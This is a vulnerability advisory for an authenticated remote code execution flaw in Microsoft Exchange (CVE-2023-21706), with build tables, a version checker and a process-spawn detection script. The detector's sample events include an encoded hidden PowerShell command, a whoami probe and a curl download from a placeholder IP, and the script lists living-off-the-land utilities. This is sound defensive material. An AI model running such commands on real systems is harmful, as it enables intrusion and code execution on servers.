CVE-2023-21706
published 2023-02-14

CVE-2023-21706: Microsoft Exchange Server Remote Code Execution Vulnerability

Priority: P2 · 60 · high
CVSS 3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
EPSS: 4.06% (89.4th percentile)

Affected

11 ranges

Vendor    | Product                                             | Version range                   | Fixed in
microsoft | exchange_server                                     |                                 |
microsoft | exchange_server                                     |                                 |
microsoft | exchange_server                                     |                                 |
microsoft | microsoft_exchange_server_2013_cumulative_update_23 | >= 15.00.0 < 15.00.1497.047     | 15.00.1497.047
microsoft | microsoft_exchange_server_2016_cumulative_update_23 | >= 15.01.0 < 15.01.2507.021     | 15.01.2507.021
microsoft | microsoft_exchange_server_2019_cumulative_update_11 | >= 15.02.0 < 15.02.0986.041     | 15.02.0986.041
microsoft | microsoft_exchange_server_2019_cumulative_update_12 | >= 15.02.0 < 15.02.1118.025     | 15.02.1118.025
msrc      | microsoft_exchange_server_2013_cumulative_update_23 |                                 |
msrc      | microsoft_exchange_server_2016_cumulative_update_23 |                                 |
msrc      | microsoft_exchange_server_2019_cumulative_update_11 |                                 |
msrc      | microsoft_exchange_server_2019_cumulative_update_12 |                                 |
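The two Exchange 2019 ranges above both start at 15.02.0 and overlap, so a literal "is the build inside a listed range" test misreports a patched CU11 server (15.2.986.41 sits inside the CU12 range). The check below, an added example that is not code from this page or from Microsoft, keys on the cumulative-update branch (major.minor.build) first and only falls back to the ranges for builds on a CU with no listed fix. The fixed builds are copied from the table; the helper names and sample build strings are assumed. Feed it the file version of ExSetup.exe, which reflects installed security updates, rather than the AdminDisplayVersion reported by Get-ExchangeServer, which only shows the CU level.

```python
"""Classify an Exchange build against the fixed-in builds for CVE-2023-21706.

Added example, not code from the page or from Microsoft. The fixed builds are
copied from the Affected table; function names and sample inputs are assumed.
"""
import re
from typing import List, Optional, Tuple

Version = Tuple[int, int, int, int]

# (lower bound, fixed build) per cumulative update, from the Affected table.
# The page's zero-padded form (15.00.1497.047) is the same build as 15.0.1497.47.
FIXED_BUILDS = {
    "Exchange Server 2013 CU23": ((15, 0, 0, 0), (15, 0, 1497, 47)),
    "Exchange Server 2016 CU23": ((15, 1, 0, 0), (15, 1, 2507, 21)),
    "Exchange Server 2019 CU11": ((15, 2, 0, 0), (15, 2, 986, 41)),
    "Exchange Server 2019 CU12": ((15, 2, 0, 0), (15, 2, 1118, 25)),
}

_DOTTED = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)\.(\d+)\s*$")
_DISPLAY = re.compile(r"^\s*Version\s+(\d+)\.(\d+)\s+\(Build\s+(\d+)\.(\d+)\)\s*$")


def parse_build(text: str) -> Version:
    """Accept '15.2.986.41' (ExSetup.exe file version) or 'Version 15.2 (Build 986.41)'."""
    m = _DOTTED.match(text) or _DISPLAY.match(text)
    if not m:
        raise ValueError(f"unrecognised Exchange build string: {text!r}")
    major, minor, build, rev = (int(g) for g in m.groups())
    return (major, minor, build, rev)


def in_listed_ranges(v: Version) -> List[str]:
    """Products whose literal '>= lo < fixed' range contains v.

    Kept for contrast: because the two 2019 ranges overlap, a patched CU11
    build (15.2.986.41) still falls inside the CU12 range.
    """
    return [p for p, (lo, fixed) in FIXED_BUILDS.items() if lo <= v < fixed]


def assess(build_text: str) -> Tuple[str, Optional[str]]:
    """Return (status, product).

    fixed        on a listed CU branch, at or above the fixed revision
    vulnerable   on a listed CU branch, below the fixed revision
    unsupported  below a fixed build but on a CU with no listed fix
    unlisted     newer than every listed range (e.g. a later CU)
    """
    v = parse_build(build_text)
    branch = v[:3]  # major.minor.build identifies the cumulative update
    for product, (_lo, fixed) in FIXED_BUILDS.items():
        if fixed[:3] == branch:
            return ("fixed" if v >= fixed else "vulnerable", product)
    hits = in_listed_ranges(v)
    if hits:
        return ("unsupported", hits[0])
    return ("unlisted", None)


if __name__ == "__main__":
    # Sample build strings are assumed; 15.2.858.5 stands for an older, unpatched
    # CU and 15.2.1258.12 for a CU released after the fix.
    for sample in ("15.2.986.37", "15.2.986.41", "Version 15.1 (Build 2507.21)",
                   "15.2.858.5", "15.2.1258.12", "15.0.1497.48"):
        print(f"{sample:32} -> {assess(sample)}")
```

Treat "unsupported" as vulnerable for triage purposes: the server is below a fixed build and no update exists for its CU, so the remediation is a CU upgrade followed by the security update.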

Detection & IOCs (extracted from sources)

  • Exploitation requires an authenticated (low-privilege) network call to the Exchange server, with no user interaction; monitor authenticated requests to Exchange endpoints that attempt to trigger code execution in the context of the server account.
  • Watch for attempts to bypass SSRF signatures in web application firewalls fronting Exchange: an attacker without credentials may try an SSRF bypass (as with ProxyNotShell, CVE-2022-41082) to satisfy the authentication requirement for CVE-2023-21706.
  • Monitor Exchange servers for credential brute-force activity, since attackers may brute-force Exchange credentials to meet the authentication requirement.
  • Successful exploitation yields code execution as SYSTEM on the Exchange server; alert on unexpected SYSTEM-level processes spawned by Exchange worker processes.
  • As of the source blog's publication date, no public proof-of-concept exploit existed for CVE-2023-21706; Microsoft rated exploitation "More Likely", but no in-the-wild exploitation had been confirmed.
  • Targeted attacks on self-hosted Exchange are expected to be stealthy and direct rather than mass scanning; defenders should prioritize targeted-attack detection over mass-exploitation signatures.
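The "unexpected SYSTEM-level process spawned by an Exchange worker process" indicator above, turned into detection logic and run over sample process-creation events. This is an added example, not code from this page or from Microsoft. Events use Sysmon Event ID 1 field names (Image, ParentImage, ParentCommandLine, CommandLine, User); the sample events are constructed, and the allowlist of ASP.NET compiler children is an assumed baseline to tune against your own environment.

```python
"""Flag SYSTEM-context child processes of Exchange IIS worker processes.

Added example, not code from the page or from Microsoft. Field names follow
Sysmon Event ID 1 (process creation); the sample events are constructed.
"""
import json
from typing import Dict, List, Optional

# Exchange front-end and back-end app pools run inside w3wp.exe; IIS passes the
# pool name on the worker's command line (-ap "MSExchangeOWAAppPool", ...).
APP_POOL_MARKER = "msexchange"

# Shells and download/execute utilities an Exchange worker never needs to launch.
HIGH_CONFIDENCE = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe",
                   "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# ASP.NET dynamic compilation spawns these from w3wp.exe; assumed benign baseline.
ALLOWLIST = {"csc.exe", "cvtres.exe", "conhost.exe"}

SYSTEM_USERS = {"nt authority\\system", "system"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_exchange_worker(event: Dict) -> bool:
    """True when the parent is w3wp.exe hosting an MSExchange* app pool."""
    return (basename(event.get("ParentImage", "")) == "w3wp.exe"
            and APP_POOL_MARKER in event.get("ParentCommandLine", "").lower())


def evaluate(event: Dict) -> Optional[Dict]:
    """Return an alert dict for a suspicious spawn, else None."""
    if not is_exchange_worker(event):
        return None
    if event.get("User", "").lower() not in SYSTEM_USERS:
        return None  # not the SYSTEM-context execution the advisory describes
    child = basename(event.get("Image", ""))
    if child in ALLOWLIST:
        return None
    return {
        "record": event.get("RecordId"),
        "severity": "high" if child in HIGH_CONFIDENCE else "medium",
        "child": child,
        "parent_cmdline": event.get("ParentCommandLine", ""),
        "cmdline": event.get("CommandLine", ""),
    }


def scan(lines: List[str]) -> List[Dict]:
    """Run evaluate() over JSON-lines process-creation events."""
    alerts = []
    for line in lines:
        hit = evaluate(json.loads(line))
        if hit:
            alerts.append(hit)
    return alerts


W3WP = r"C:\Windows\System32\inetsrv\w3wp.exe"
OWA_POOL = W3WP + ' -ap "MSExchangeOWAAppPool" -v "v4.0" -l "webengine4.dll"'
ECP_POOL = W3WP + ' -ap "MSExchangeECPAppPool" -v "v4.0" -l "webengine4.dll"'

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"RecordId": 1, "ParentImage": W3WP, "ParentCommandLine": OWA_POOL,
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"RecordId": 2, "ParentImage": W3WP, "ParentCommandLine": OWA_POOL,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": "csc.exe /noconfig /fullpaths @App_Web_owa.cmdline",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"RecordId": 3, "ParentImage": W3WP, "ParentCommandLine": W3WP + ' -ap "DefaultAppPool"',
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir",
     "User": r"IIS APPPOOL\DefaultAppPool"},
    {"RecordId": 4, "ParentImage": W3WP, "ParentCommandLine": ECP_POOL,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"RecordId": 5, "ParentImage": W3WP, "ParentCommandLine": ECP_POOL,
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -o C:\Windows\Temp\x.txt http://203.0.113.5/x",
     "User": r"NT AUTHORITY\SYSTEM"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LINES):
        print(alert)
```

Records 1, 4 and 5 are reported; the csc.exe compile (record 2) is allowlisted and the DefaultAppPool spawn (record 3) is not an Exchange worker. Keep the allowlist short and review it periodically: an attacker who lands a web shell in an Exchange app pool inherits the same SYSTEM context, so every non-baseline child is worth a look even at "medium".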

CVSS provenance

Source      | Version | Score | Severity | Vector
nvd         | v3.1    | 8.8   | HIGH     | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vendor_msrc |         | 8.8   | HIGH     |